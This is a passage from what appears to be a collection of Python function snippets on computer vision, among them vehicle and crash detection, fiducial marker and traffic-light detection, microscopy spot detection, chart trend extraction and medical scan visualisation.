new_mag))\n\n '''curr_image = images[i]\n x1, y1, x2, y2 = car_points[i][j]\n text = \"{:.4f}; {:.4f}; {:.4f}\".format(old_mag, new_mag, min_dist)\n cv2.putText(curr_image, text, (x1, y1 - 20), cv2.FONT_HERSHEY_SIMPLEX,\n 0.41, color, 1)\n images[i] = curr_image'''\n\n if old_mag != 0 and abs(old_mag - new_mag) > 75:\n crash_frames.append(i)\n curr_image = images[i]\n width = curr_image.shape[1]\n height = curr_image.shape[0]\n x1, y1, x2, y2 = carpoints[i][j]\n cv2.rectangle(curr_image, (x1, y1), (x2, y2), color, 2)\n images[i] = curr_image\n # print(\"CRASH at frame %d\" % (i))\n\n updated_car_points[i][min_ind] = (curr_x, curr_y, new_mag)\n\n if i == len(centered) - 1:\n continue\n\n updated_car_points[i + 1] = [0 for k in range(max(len(updated_car_points[i]), len(centered[i + 1])))]\n return crash_frames, images", "def show_performance(model):\n val_image_ids_ = [i for i in val_image_ids]\n np.random.shuffle(val_image_ids_)\n\n df_val = area_filter(val_image_ids_, val_coco)\n image_id = df_val['image_id'].iloc[0]\n annotation_ids = df_val[df_val['image_id'] == image_id]['annotation_id'].tolist()\n\n image_json = val_coco.loadImgs([image_id])[0]\n raw_image = cv2.imread(os.path.join(\"{}/{}/{}\".format(data_dir, val_type, image_json['file_name'])))\n height, width, _ = raw_image.shape\n\n # decode the mask, using annotation id created at the group by above\n binary_mask = process_mask(val_coco, annotation_ids, width, height)\n\n # preprocess input and mask (resize to 128, scale to [0, 1))\n input_image, input_mask = preprocess(raw_image, binary_mask)\n\n input_mask = np.expand_dims(input_mask, axis=-1)\n predicted_mask = model.predict(np.array([input_image]))[0]\n\n plt.figure(figsize=(20, 20))\n\n title = ['Input Image', 'True Mask', 'Predicted Mask']\n display_list = [input_image[:, :, ::-1], input_mask, predicted_mask]\n for i in range(len(display_list)):\n plt.subplot(1, len(display_list), i+1)\n plt.title(title[i])\n plt.imshow(array_to_img(display_list[i]))\n plt.axis('off')\n plt.show()", "def pipeline(image):\n # undistort image\n undistorted_image = undistort_image(image)\n superimposed_image = find_lanes(undistorted_image)\n labels = find_vehicles(undistorted_image)\n\n draw_img = draw_labeled_bboxes(superimposed_image, labels)\n\n \n return draw_img", "def detect(image):\n markers = []\n # Stage 1: Detect edges in image\n gray = cvtColor(image, COLOR_BGR2GRAY)\n clahe = createCLAHE(clipLimit=1, tileGridSize=(6, 6))\n cl1 = clahe.apply(gray)\n _, thresh = threshold(cl1, 60, 255, THRESH_OTSU)\n blurred = GaussianBlur(thresh, (5, 5), 0)\n edges = Canny(blurred, 75, 100)\n\n # Stage 2: Find contours\n contours = findContours(edges, RETR_TREE, CHAIN_APPROX_SIMPLE)\n contours = sorted(contours, key=contourArea, reverse=True)[:]\n\n for contour in contours:\n # Stage 3: Shape check\n perimeter = arcLength(contour, True)\n approx = approxPolyDP(contour, 0.01*perimeter, True)\n\n if len(approx) == QUADRILATERAL_POINTS:\n area = contourArea(approx)\n # (x, y, w, h) = boundingRect(approx)\n # ar = float(h) / float(w)\n # if area > 100 and ar >= 0.8 and ar <= 1.2:\n if area > 700:\n # putText(image, str(area), (10, 30), FONT_HERSHEY_SIMPLEX, 0.6, (0, 0, 255), 2)\n drawContours(image, [contour], -1, (0, 255, 0), 1)\n\n # Stage 4: Perspective warping\n topdown_quad = get_topdown_quad(thresh, approx.reshape(4, 2))\n\n # Stage 5: Border check\n if topdown_quad[int((topdown_quad.shape[0]/100.0)*5), int((topdown_quad.shape[1]/100.0)*5)] > BLACK_THRESHOLD:\n continue\n\n # Stage 6: Get marker pattern\n marker_pattern = None\n\n try:\n marker_pattern = get_marker_pattern(topdown_quad, THRESHOLD_PERCENT)\n except:\n continue\n\n if not marker_pattern:\n continue\n\n # Stage 7: Match marker pattern\n marker_found, marker_rotation, marker_name = match_marker_pattern(marker_pattern)\n\n if marker_found:\n markers.append([marker_name, marker_rotation])\n\n return markers, image", "def test():\n import os\n import ClearMap.ImageProcessing.SpotDetection as self\n reload(self)\n import ClearMap.IO as io \n import ClearMap.Settings as settings\n \n basedir = settings.ClearMapPath;\n #fn = '/home/ckirst/Science/Projects/BrainActivityMap/Data/iDISCO_2015_06/Adult cfos C row 20HF 150524.ims';\n fn = os.path.join(basedir, 'Test/Data/Synthetic/label_iDISCO_\\d{3}.tif');\n fn = os.path.join(basedir, 'Test/Data/OME/16-17-27_0_8X-s3-20HF_UltraII_C00_xyz-Table Z\\d{4}.ome.tif');\n #fn = '/run/media/ckirst/ChristophsBackuk4TB/iDISCO_2015_06/Adult cfos C row 20HF 150524.ims';\n #fn = '/home/nicolas/Windows/Nico/cfosRegistrations/Adult cfos C row 20HF 150524 - Copy.ims';\n #fn = '/home/ckirst/Science/Projects/BrainActivityMap/iDISCO_2015_04/test for spots added spot.ims'\n\n img = io.readData(fn);\n #img = dataset[0:500,0:500,1000:1008];\n #img = dataset[600:1000,1600:1800,800:830];\n #img = dataset[500:1500,500:1500,800:809]; \n img = img.astype('int16');\n \n #m = sys.modules['iDISCO.ImageProcessing.SpotDetection']\n #c = self.detectCells(img);\n \n c = self.detectCells(img, dogSize = None, cellShapeThreshold = 1, cellShapeFile = '/home/ckirst/Science/Projects/BrainActivityMap/Analysis/iDISCO/Test/Data/CellShape/cellshape_\\d{3}.tif');\n \n print ('done, found %d cells !' % c[0].shape[0])\n\n\n #test intensities:\n import numpy;\n x = numpy.random.rand(30,30,10);\n centers = numpy.array([[0,0,0], [29,29,9]]);\n i = self.findIntensity(x, centers, boxSize = (1,1,1));\n print (i)", "def detect_cars_multi_area(img,\n clf,\n xy_window=(64, 64),\n stride=None,\n y_start_stops=None,\n image_size_factors=[1],\n x_padding=None,\n heatmap=False,\n n_jobs=1):\n\n if n_jobs < 0:\n n_jobs = multiprocessing.cpu_count()\n\n if stride is None:\n stride = np.repeat([[xy_window[0], xy_window[1]]], len(image_size_factors), axis=0)\n\n if y_start_stops is None:\n y_start_stops = np.repeat([[0, img.shape[0] - 1]], len(image_size_factors), axis=0)\n\n if x_padding is None:\n x_padding = np.repeat([0], len(image_size_factors), axis=0)\n\n # use joblib to run processing in parallel\n result = Parallel(n_jobs=n_jobs)(\n delayed(detect_cars)(\n img,\n clf,\n xy_window,\n cur_stride,\n cur_sizes_factors,\n cur_y_start_stop,\n cur_x_padding)\n for cur_stride, cur_sizes_factors, cur_y_start_stop, cur_x_padding in\n zip(stride, image_size_factors, y_start_stops, x_padding))\n\n bounding_boxes, des_func = zip(*result)\n bounding_boxes = np.vstack(bounding_boxes)\n\n des_func = np.concatenate(des_func)\n\n if heatmap:\n heat = np.zeros(img.shape[:2], dtype=np.float32)\n for bb, df in zip(bounding_boxes, des_func):\n heat[bb[1]:bb[3], bb[0]:bb[2]] += df\n\n return heat\n\n return bounding_boxes", "def vis_detections(im, class_name, dets, thresh=0.8):\n\n dict = {'HolderA': 'Holder', 'WheelA': 'WheelA', 'WheelB': 'WheelB', 'BrakeA': 'Brake', 'SpringA': 'Spring',\n 'BuckleA': 'BuckleA', 'BuckleB': 'BuckleB', 'TubeA': 'Tube', 'NutA': 'NutA', 'ScrewA': 'ScrewA',\n 'NutB': 'NutB', 'ScrewB': 'ScrewB',\n 'WireA': 'Wire', 'PlateA': 'PlateA', 'PlateB': 'PlateB', 'PlateD': 'PlateC', 'PlateE': 'PlateD',\n 'BoltA': 'Bolt', 'LoopB': 'Loop', 'JointA': 'JointA', 'JointB': 'JointB', 'FixatorA': 'Fixator',\n 'BearingA': 'Bearing', 'PlugA': 'Plug'}\n\n for i in range(np.minimum(10, dets.shape[0])):\n bbox = tuple(int(np.round(x)) for x in dets[i, :4])\n score = dets[i, -1]\n if score > thresh:\n # Color site: http://www.wahart.com.hk/rgb.htm\n if class_name == 'HolderA':\n color = (255, 255, 0) # Cyan\n elif class_name == 'WheelA':\n color = (212, 255, 127) # Aquamarina\n elif class_name == 'WheelB':\n color = (99, 99, 238) # IndianRed2\n elif class_name == 'BrakeA':\n color = (99, 99, 238) # IndianRed2\n elif class_name == 'SpringA':\n color = (180, 130, 70) # SteelBlue\n elif class_name == 'BuckleA':\n color = (205, 0, 0) # MediumBlue\n elif class_name == 'BuckleB':\n color = (170, 205, 102) # MediumAquamarine\n elif class_name == 'BuckleC':\n color = (0, 252, 124) # LawnGreen\n elif class_name == 'BuckleD':\n color = (50, 205, 50) # LimeGreen\n elif class_name == 'TubeA':\n color = (147, 112, 219) # PaleVioletRed\n elif class_name == 'ScrewA':\n color = (240, 32, 160) # Purple\n elif class_name == 'ScrewB':\n color = (0, 165, 255) # Orange1\n elif class_name == 'ScrewC':\n color = (48, 48, 255) # Firebrick1\n elif class_name == 'NutA':\n color = (0, 255, 255) # Yellow\n elif class_name == 'NutB':\n color = (255, 144, 30) # DodgerBlue\n elif class_name == 'NutC':\n color = (180, 238, 180) # DarkSeaGreen2\n elif class_name == 'WireA':\n color = (255, 255, 255) # White\n elif class_name == 'PlateA':\n color = (0, 69, 255) # OrangeRed\n elif class_name == 'PlateB':\n color = (102, 205, 0) # SpringGreen3\n elif class_name == 'PlateD':\n color = (0, 255, 0) # Green\n elif class_name == 'PlateE':\n color = (0, 140, 250) # DarkOrange\n elif class_name == 'BoltA':\n color = (255, 255, 0) # Cyan\n elif class_name == 'LoopB':\n color = (180, 105, 255) # HotPink\n elif class_name == 'JointA':\n color = (105, 140, 255) # Salmon1\n elif class_name == 'JointB':\n color = (255, 0, 255) # Magenta3\n elif class_name == 'FixatorA':\n color = (0, 205, 102) # Chartreuse3\n elif class_name == 'BearingA':\n color = (185, 218, 255) # PeachPuff\n elif class_name == 'PlugA':\n color = (193, 193, 255) # RosyBrown1\n else:\n color = (139, 0, 139) # DarkMagenta\n cv2.rectangle(im, bbox[0:2], bbox[2:4], color, 2)\n # cv2.putText(im, '%s: %.3f' % (class_name, score), (bbox[0], bbox[1] + 15), cv2.FONT_HERSHEY_COMPLEX,\n # 0.5, color, thickness=1)\n cv2.putText(im, '%s: %.3f' % (dict[class_name], score), (bbox[0], bbox[1] + 15), cv2.FONT_HERSHEY_COMPLEX,\n 0.5, color, thickness=1)\n return im", "def analyze(self):\n try:\n self.options[self.multi_image][1]()\n except:\n raise Exception(\"Multi Image Option not defined.\")\n\n self.image = self.data / self.exposure\n\n background = self.min_val = np.min(self.image[:511,:511])\n self.max_val = np.max(self.image[:511,:511])\n # stats.mode returns modal value = value that occours most often\n #background = stats.mode(im[:50,:50].ravel())[0][0]\n\n intensity = self.image.sum() - background*np.size(self.image)\n\n #results.append((self.index, intensity, background))\n self.index =+ 1", "def predict_crashes_with_tracking(images, car_points, centered, depths, depth_differential=15, distance_differential=50,\n look_ahead=10):\n images = images.copy()\n lh = look_ahead\n\n # plot 5 frames forward\n # check size of the cars to indicate depth\n\n color = (0, 255, 255)\n wh = [(x[2] - x[0], x[3] - x[1]) for x in car_points[0]]\n for i in range(len(centered)):\n look_ahead = [[(0, 0) for i in range(len(centered[i]))] for j in range(lh + 1)]\n\n if i == 0:\n continue\n\n dxs = [0 for i in range(len(centered[i]))]\n dys = [0 for i in range(len(centered[i]))]\n\n for j in range(len(centered[i])):\n dxs[j] = centered[i][j][0] - centered[i - 1][j][0]\n dys[j] = centered[i][j][1] - centered[i - 1][j][1]\n\n look_ahead[0] = centered[i]\n for j in range(1, lh + 1):\n for k in range(len(centered[i])):\n xc = look_ahead[j - 1][k][0] + dxs[k]\n yc = look_ahead[j - 1][k][1] + dys[k]\n look_ahead[j][k] = (xc, yc)\n\n for j in range(1, lh + 1):\n for k in range(0, len(look_ahead[j]) - 1):\n for l in range(k + 1, len(look_ahead[j])):\n x1, y1 = look_ahead[j][k]\n x2, y2 = look_ahead[j][l]\n dist = math.sqrt((x2 - x1) ** 2 + (y2 - y1) ** 2)\n if dist < (images[0].shape[0] / 18) * ((distance_differential + 50) / 100) and abs(\n math.sqrt(depths[min(i + lh, len(car_points) - 1)][k]) - math.sqrt(\n depths[min(i + lh, len(car_points) - 1)][\n l])) < depth_differential / 100: # max(depths[min(i+lh, len(car_points)-1)][\n # k]/depths[min(i+lh, len(car_points)-1)][l], depths[min(i+lh, len(car_points)-1)][l]/depths[\n # min(i+lh, len(car_points)-1)][k]) - 1 < 0.1:#9.5:#0.30: #this is the pixel number which I\n # use for the threshold\n curr_image = images[i]\n a1, a2, b1, b2 = car_points[i][k]\n c1, c2, d1, d2 = car_points[i][l]\n cv2.rectangle(curr_image, (a1, a2), (b1, b2), (0, 0, 255), 5)\n cv2.rectangle(curr_image, (c1, c2), (d1, d2), (0, 0, 255), 5)\n images[i] = curr_image\n return images", "def updateFrame(self, image):\n self.currentFrame += 1\n self.image = image.copy()\n\n detected = self.car_detector.detectCars(image)\n picks = self.car_detector.non_max_suppression_fast(detected, 0.2)\n\n self.logger.debug(\" CURRENT CAR LIST\\n\")\n self.printCars()\n\n self.logger.debug(\"\\nNew Picks {0!s}\\n\".format(picks))\n\n self.addCars(picks)\n self.removeOldCars()\n if len(self.cars) == 0:\n self.logger.debug(\"EMPTY.... HELP\")\n # self.printCars()\n return self.drawCars()", "def get_images_and_labels_nc():\n refs = get_ref_df()\n images = {}\n for _, data in refs.iterrows():\n if data['ProbeFileName'] in images:\n continue\n im = data['ProbeFileName']\n images[im] = 1 if data['IsTarget'] == 'Y' else 0\n return images", "def detectSpots(img, detectSpotsParameter = None, correctIlluminationParameter = None, removeBackgroundParameter = None,\n filterDoGParameter = None, findExtendedMaximaParameter = None, detectCellShapeParameter = None,\n verbose = False, out = sys.stdout, **parameter):\n\n timer = Timer();\n \n # normalize data -> to check\n #img = img.astype('float');\n #dmax = 0.075 * 65535;\n #ids = img > dmax;\n #img[ids] = dmax;\n #img /= dmax; \n #out.write(timer.elapsedTime(head = 'Normalization'));\n #img = dataset[600:1000,1600:1800,800:830];\n #img = dataset[600:1000,:,800:830];\n \n # correct illumination\n correctIlluminationParameter = getParameter(detectSpotsParameter, \"correctIlluminationParameter\", correctIlluminationParameter);\n img1 = img.copy();\n img1 = correctIllumination(img1, correctIlluminationParameter = correctIlluminationParameter, verbose = verbose, out = out, **parameter) \n\n # background subtraction in each slice\n #img2 = img.copy();\n removeBackgroundParameter = getParameter(detectSpotsParameter, \"removeBackgroundParameter\", removeBackgroundParameter);\n img2 = removeBackground(img1, removeBackgroundParameter = removeBackgroundParameter, verbose = verbose, out = out, **parameter) \n \n # mask\n #timer.reset();\n #if mask == None: #explicit mask\n # mask = img > 0.01;\n # mask = binary_opening(mask, self.structureELement('Disk', (3,3,3)));\n #img[img < 0.01] = 0; # masking in place # extended maxima\n #out.write(timer.elapsedTime(head = 'Mask')); \n \n #DoG filter\n filterDoGParameter = getParameter(detectSpotsParameter, \"filterDoGParameter\", filterDoGParameter);\n dogSize = getParameter(filterDoGParameter, \"size\", None);\n #img3 = img2.copy(); \n img3 = filterDoG(img2, filterDoGParameter = filterDoGParameter, verbose = verbose, out = out, **parameter);\n \n # normalize \n # imax = img.max();\n # if imax == 0:\n # imax = 1;\n # img /= imax;\n \n # extended maxima\n findExtendedMaximaParameter = getParameter(detectSpotsParameter, \"findExtendedMaximaParameter\", findExtendedMaximaParameter);\n hMax = getParameter(findExtendedMaximaParameter, \"hMax\", None);\n imgmax = findExtendedMaxima(img3, findExtendedMaximaParameter = findExtendedMaximaParameter, verbose = verbose, out = out, **parameter);\n \n #center of maxima\n if not hMax is None:\n centers = findCenterOfMaxima(img, imgmax, verbose = verbose, out = out, **parameter);\n else:\n centers = findPixelCoordinates(imgmax, verbose = verbose, out = out, **parameter);\n \n #cell size detection\n detectCellShapeParameter = getParameter(detectSpotsParameter, \"detectCellShapeParameter\", detectCellShapeParameter);\n cellShapeThreshold = getParameter(detectCellShapeParameter, \"threshold\", None);\n if not cellShapeThreshold is None:\n \n # cell shape via watershed\n imgshape = detectCellShape(img2, centers, detectCellShapeParameter = detectCellShapeParameter, verbose = verbose, out = out, **parameter);\n \n #size of cells \n csize = findCellSize(imgshape, maxLabel = centers.shape[0], out = out, **parameter);\n \n #intensity of cells\n cintensity = findCellIntensity(img, imgshape, maxLabel = centers.shape[0], verbose = verbose, out = out, **parameter);\n\n #intensity of cells in background image\n cintensity2 = findCellIntensity(img2, imgshape, maxLabel = centers.shape[0], verbose = verbose, out = out, **parameter);\n \n #intensity of cells in dog filtered image\n if dogSize is None:\n cintensity3 = cintensity2;\n else:\n cintensity3 = findCellIntensity(img3, imgshape, maxLabel = centers.shape[0], verbose = verbose, out = out, **parameter);\n \n if verbose:\n out.write(timer.elapsedTime(head = 'Spot Detection') + '\\n');\n \n #remove cell;s of size 0\n idz = csize > 0;\n \n return ( centers[idz], numpy.vstack((cintensity[idz], cintensity3[idz], cintensity2[idz], csize[idz])).transpose()); \n \n \n else:\n #intensity of cells\n cintensity = findIntensity(img, centers, verbose = verbose, out = out, **parameter);\n\n #intensity of cells in background image\n cintensity2 = findIntensity(img2, centers, verbose = verbose, out = out, **parameter);\n \n #intensity of cells in dog filtered image\n if dogSize is None:\n cintensity3 = cintensity2;\n else:\n cintensity3 = findIntensity(img3, centers, verbose = verbose, out = out, **parameter);\n\n if verbose:\n out.write(timer.elapsedTime(head = 'Spot Detection') + '\\n');\n \n return ( centers, numpy.vstack((cintensity, cintensity3, cintensity2)).transpose());", "def draw_info(self, img, age_threshold=8):\n self.n_vehicles = 0\n for detection in self.detections:\n if len(detection.last_boxes) > age_threshold:\n self.n_vehicles += 1\n img = detection.draw(img, thick=2, color=(255, 50, 0))\n\n cv2.putText(img, 'Vehicles in sight: %s' % self.n_vehicles, (50, 150), cv2.FONT_HERSHEY_SIMPLEX, 1,\n (255, 255, 255), 2)\n\n return img", "def traffic_light_detection(img_in, radii_range):\n\n thresh1 = 110\n thresh2 = 60\n cannyEdges = cv2.Canny(img_in, thresh1, thresh2)\n\n circles = cv2.HoughCircles(cannyEdges,cv2.HOUGH_GRADIENT, 1, 20, param1=50,param2=30,minRadius=0,maxRadius=0)\n circles_selected = select_three(circles)\n\n for circle in circles_selected:\n column = circle[0]\n row = circle[1]\n coordinates = (column, row)\n state_pixels = img_in[int(row), int(column), :]\n # print(state_pixels)\n if state_pixels[1] == 255 and state_pixels[2] != 255 :\n state = 'green'\n if state_pixels[1] != 255 and state_pixels[2] == 255 :\n state = 'red'\n if state_pixels[1] == 255 and state_pixels[2] == 255 :\n state = 'yellow'\n\n column_2 = circles_selected[1][0]\n row_2 = circles_selected[1][1]\n coordinates_2 = (column_2, row_2)\n state_pixels_2 = img_in[int(row_2), int(column_2), :]\n\n return coordinates_2, state\n raise NotImplementedError", "def find_components_old(image,deltaPix,lens_rad_arcsec = 5.0,lens_rad_ratio = None, gal_rad_ratio = 0.1,min_size_arcsec=0.3,thresh=0.4, show_locations=False):\n\n # convert minimum component size in pixel units\n min_size = int(min_size_arcsec / deltaPix)\n \n #Convert lens radius and central galaxy radius to pixels\n if lens_rad_ratio == None:\n lens_rad = int(lens_rad_arcsec / deltaPix)\n else: lens_rad = int(len(image) * lens_rad_ratio)\n gal_rad = int(len(image) * gal_rad_ratio)\n \n # downscale source image to data resolution (for speed + easier for converting to data units)\n #down = image_util.re_size(image, factor=supersampling_factor_source)\n \n # apply laplacian of gaussian (LoG) filter to enhance maxima\n filtered = - gaussian_laplace(deepcopy(image), sigma = min_size, mode='constant', cval=0.)\n \n# print(filtered.min(),filtered.max(),filtered.min() + thresh * np.abs(filtered.min()))\n \n \n # assume all value below max*threshold can not be maxima, so put all to zero\n# filtered[filtered < thresh*filtered.max()] = 0.\n \n# assume all value below min*threshold can not be maxima, so put all to zero\n filtered[filtered < filtered.min() + thresh * np.abs(filtered.min())] = 0.\n \n if show_locations:\n plt.figure(figsize = (8,8))\n plt.subplot(1,2,1)\n plt.imshow(image, origin='lower', norm=SymLogNorm(5))\n plt.title('Image')\n\n plt.subplot(1,2,2)\n plt.imshow(filtered, origin='lower', norm=SymLogNorm(5))\n plt.title('Filtered Image')\n plt.show()\n \n # find coordinates of local maxima\n #print(int(0.5 * min_size))\n max_idx_2d_small = peak_local_max(filtered, min_distance=0)\n max_idx_2d_large = peak_local_max(filtered, min_distance=1)\n \n x_list_small, y_list_small = max_idx_2d_small[:, 1], max_idx_2d_small[:, 0]\n x_list_large, y_list_large = max_idx_2d_large[:, 1], max_idx_2d_large[:, 0]\n \n im_center_x, im_center_y = len(image) / 2., len(image) / 2.\n \n R = np.sqrt((x_list_large - im_center_x)**2 + (y_list_large - im_center_y)**2)\n new_center_x, new_center_y = x_list_large[R < gal_rad], y_list_large[R < gal_rad]\n \n if (len(new_center_x) > 1) and (len(x_list_large[R == R.min()]) ==1 ): \n new_center_x, new_center_y = x_list_large[R == R.min()], y_list_large[R == R.min()]\n elif (len(new_center_x) > 1) and (len(x_list_large[R == R.min()]) > 1 ): \n new_center_x, new_center_y = im_center_x, im_center_y\n elif len(new_center_x) == 0: \n new_center_x, new_center_y = im_center_x, im_center_y\n \n \n R_small = np.sqrt((x_list_small - new_center_x)**2 + (y_list_small - new_center_y)**2)\n R_large = np.sqrt((x_list_large - new_center_x)**2 + (y_list_large - new_center_y)**2)\n \n x_sats, y_sats = x_list_small[R_small > lens_rad], y_list_small[R_small > lens_rad]\n \n # show maxima on image for debug\n if show_locations:\n fig = plt.figure(figsize=(4, 4))\n #plt.imshow(image, origin='lower', cmap=cmap_flux, norm=LogNorm(1e-2))\n plt.imshow(image, origin='lower', norm=SymLogNorm(5))\n \n for i in range(len(x_sats)):\n plt.scatter([x_sats[i]], [y_sats[i]], c='red', s=60, marker='+')\n# plt.annotate(i+1, (x_list[i], y_list[i]), color='black')\n \n# for i in range(len(x_mask)):\n# plt.scatter([x_mask[i]], [y_mask[i]], c='red', s=100, marker='*')\n# plt.annotate(i+1, (x_mask[i], y_mask[i]), color='red')\n plt.scatter(new_center_x, new_center_y,c='red', s=100, marker='*')\n \n draw_lens_circle = Circle((new_center_x, new_center_y),lens_rad ,fill=False)\n draw_gal_circle = Circle((new_center_x, new_center_y),gal_rad, fill = False)\n plt.gcf().gca().add_artist(draw_lens_circle)\n plt.gcf().gca().add_artist(draw_gal_circle)\n plt.title('Detected Components')\n plt.text(1, 1, \"detected components\", color='red')\n fig.axes[0].get_xaxis().set_visible(True); fig.axes[0].get_yaxis().set_visible(True)\n plt.show()\n return (x_sats, y_sats), (new_center_x, new_center_y)", "def identify_image(im):\n score_cures = np.mean(im[1025:1065, 1130:1180, 0])\n score_ingredients = np.mean(im[1025:1065, 675:720, 0])\n if score_cures < 177.5:\n return 'cures'\n if score_ingredients < 177.5:\n return 'ingredients'\n else:\n return 'other'", "def config_hog_search(self, img):\n img = img.astype(np.float32)/255 # scale image: (png: 0-1, jpg: 0-255)\n img_crop = img[self.ys[0]:self.ys[1], :, :] # crop img to relative dimensions (ROI)\n clr_trf = cvf.transform_colorspace(img_crop, self.color_space) # transform color space from RGB\n clr_trf = cvu.scale_image(clr_trf, self.scale) # scale rather than selecting diffferent window sizes\n ch1, ch2, ch3 = [clr_trf[:,:,ch] for ch in range(3)] # HOG operates on per channel basis\n\n # get hog features as multi-dimensional array per channel for the entire image\n params={'orient':self.orient, 'pix_per_cell':self.pix_per_cell, 'cells_per_block':self.cells_per_block}\n params.update({'vis':False, 'feature_vec':False})\n hog1,hog2,hog3 = [cvf.get_hog_features(ch, **params) for ch in ([ch1,ch2,ch3])]\n # block configurations\n self.nfeat_per_block = self.orient*self.cells_per_block**2\n self.nblocks_per_window = (self.window //self.pix_per_cell) -1\n # number_blocks: define number of hog cells across an image according to channel dimensions\n # number_steps: define number of steps to occur across hog array to extract features\n rows, cols = ch1.shape[:2]\n number_blocks = lambda max_dim, pix_per_cell: (max_dim // pix_per_cell) -1\n number_steps = lambda nblocks, nblocks_window, cells_step: (nblocks - nblocks_window)//cells_step\n self.nxblocks, self.nyblocks = number_blocks(cols, self.pix_per_cell), number_blocks(rows, self.pix_per_cell)\n nxsteps, nysteps = \\\n [number_steps(it, self.nblocks_per_window, self.cells_per_step) for it in (self.nxblocks, self.nyblocks) ]\n return clr_trf, (nxsteps, nysteps), (hog1,hog2,hog3)", "def vis_detections(color_image, depth_colormap, class_col, dets_col, thresh=0.5):\n\n for cls_ind, class_name in enumerate(class_col):\n dets = dets_col[cls_ind]\n\n inds = np.where(dets[:, -1] >= thresh)[0]\n if len(inds) == 0:\n continue\n\n for i in inds:\n bbox = [int(e) for e in dets[i, :4]]\n score = dets[i, -1]\n \n cv2.rectangle(color_image, (bbox[0], bbox[1]),\n (bbox[2], bbox[3]), (0, 0, 255), 3)\n cv2.rectangle(depth_colormap, (bbox[0], bbox[1]),\n (bbox[2], bbox[3]), (0, 0, 255), 3)\n\n font = cv2.FONT_HERSHEY_SIMPLEX\n color_image = cv2.putText(color_image, '{:s} {:.3f}'.format(class_name, score),\n (bbox[0], max(bbox[1] - 2, 1)), font, 0.5, (255, 255, 255), 2)\n depth_colormap = cv2.putText(depth_colormap, '{:s} {:.3f}'.format(class_name, score),\n (bbox[0], max(bbox[1] - 2, 1)), font, 0.5, (255, 255, 255), 2)\n \n # Stack both images horizontally\n images = np.hstack((color_image, depth_colormap))\n\n # Show images\n cv2.imshow('RealSense', images)", "def get_all_trends(self, verbose=False):\n self.labels = []\n inferred_lines = []\n \n # crop, resize, color quantize\n self.crop_to_gridline()\n self.crop_title()\n self.set_size()\n self.color_quantization()\n \n if verbose:\n print(\"Original Image\")\n display(self.orig_image)\n print(\"Cropped and color quantized:\")\n self.display()\n \n # separate colors into color pixel, images, and pixels that belong to it\n img_and_pix = self.separate_colors()\n colors, images, pixels = zip(*img_and_pix)\n \n if verbose:\n print(\"LEN IMGS\", len(images), \"; SHOULD BE\", len(self.separate_colors()))\n \n for i, image in enumerate(images):\n \n # separate into x and y pixels\n pix = pixels[i]\n inferred_lines.append(img_and_pix[i])\n x,y = zip(*np.array(pix))\n \n if verbose:\n print('len(set(y))>20', len(set(y)))\n print('len(set(x))>20', len(set(x)))\n print('len(pix)<= {}; actual: {}'.format(self.background_threshold*np.prod(self.size), len(pix)))\n display(image)\n \n # If pixels don't fluctuate more than pixel_diff_threshold, \n # or size of color is greater than background_threshold..\n if len(pix) <= self.background_threshold*np.prod(self.size):\n if len(set(y))>self.pixel_diff_threshold \\\n and len(set(x))>self.pixel_diff_threshold:\n \n # take difference between pixels\n d = np.diff(pix, axis=0)\n segdists = np.sqrt((d ** 2).sum(axis=1))\n\n # Check if one line alone in the bitmap spans min_grid_length.\n # np.argmax(np.bincount(x)) -> keep x constant\n pot_vert_line = [j for i, j in pix if i == np.argmax(np.bincount(x))]\n pot_hor_line = [i for i, j in pix if j == np.argmax(np.bincount(y))]\n \n if verbose:\n print(\"Passed 0.25 pixel threshold and straight line threshold\")\n print(\"sum(segdists)/len(segdists)<7\", sum(segdists)/len(segdists))\n print(\"Y LINE \", pot_vert_line[0], pot_vert_line[-1], self.height*self.min_grid_span)\n print(\"X LINE\" , pot_hor_line[0], pot_hor_line[-1], self.width*self.min_grid_span)\n\n if sum(segdists)/len(segdists)<self.min_pixel_dist and \\\n len(pot_vert_line)<(self.height*self.min_grid_span) and \\\n len(pot_hor_line)<(self.width*self.min_grid_span):\n\n\n# inferred_lines.append(img_and_pix[i])\n # display(image)\n\n actual_y = self.height - np.array(pix)[:,1]\n \n df = pd.DataFrame(pix).groupby(0).agg(np.mean)\n xvals = df.index\n yvals = df.values.flatten().astype(int)\n slope, intercept, rvalue, pvalue, stderr = scp.stats.linregress(xvals, yvals)\n \n change = slope*len(yvals)\n if pvalue > 0.05 or abs(change) < 0.01:\n self.add_label(\"NO TREND\")\n else:\n if slope < 0:\n self.add_label(\"DECREASING\")\n else:\n self.add_label(\"INCREASING\") \n\n if verbose: \n print(\"-\"*50)\n if not self.labels:\n self.add_label(\"NO TREND\")\n return inferred_lines, self.labels", "def get_sun_features(image): # Use grayscale images, outside val: NaN\r\n ratio = sun_isoperimetric_ratio(image)\r\n sun_features = {\"sun_circularity_ratio\": ratio}\r\n return sun_features", "def visualize_in_scan(self, verbose=True):\n images = self.scan.load_all_dicom_images(verbose)\n \n # Preload contours and sort them by z pos.\n contours = sorted(self.contours, key=lambda c: c.image_z_position)\n fnames = self.scan.sorted_dicom_file_names.split(',')\n index_of_contour = [fnames.index(c.dicom_file_name) for c in contours]\n\n fig = plt.figure(figsize=(16,8))\n\n min_slice = min(index_of_contour)\n max_slice = max(index_of_contour)\n current_slice = min_slice\n\n ax_image = fig.add_axes([0.5,0.0,0.5,1.0])\n img = ax_image.imshow(images[current_slice].pixel_array,\n cmap=plt.cm.gray)\n\n contour_lines = []\n # We draw all the contours initally and set the visibility\n # to False. This works better than trying create and destroy\n # plots every time we update the image.\n for i,c in enumerate(contours):\n arr = c.to_matrix()\n cc, = ax_image.plot(arr[:,0], arr[:,1], '-r')\n cc.set_visible(i==0) # Set the first contour visible.\n contour_lines.append( cc )\n ax_image.set_xlim(-0.5,511.5); ax_image.set_ylim(511.5,-0.5)\n ax_image.axis('off')\n \n # Add the scan info table\n ax_scan_info = fig.add_axes([0.1, 0.8, 0.3, 0.1])\n ax_scan_info.set_axis_bgcolor('w')\n scan_info_table = ax_scan_info.table(\n cellText=[\n ['Patient ID:', self.scan.patient_id],\n ['Slice thickness:', '%.3f mm' % self.scan.slice_thickness],\n ['Pixel spacing:', '%.3f mm'%self.scan.pixel_spacing]\n ],\n loc='center', cellLoc='left'\n )\n # Remove the cell borders.\n # It Seems like there should be an easier way to do this...\n for cell in scan_info_table.properties()['child_artists']:\n cell.set_color('w')\n\n ax_scan_info.set_title('Scan Info')\n ax_scan_info.set_xticks([])\n ax_scan_info.set_yticks([])\n\n # Add annotations / characteristics table.\n ax_annotation_info = fig.add_axes([0.1, 0.45, 0.3, 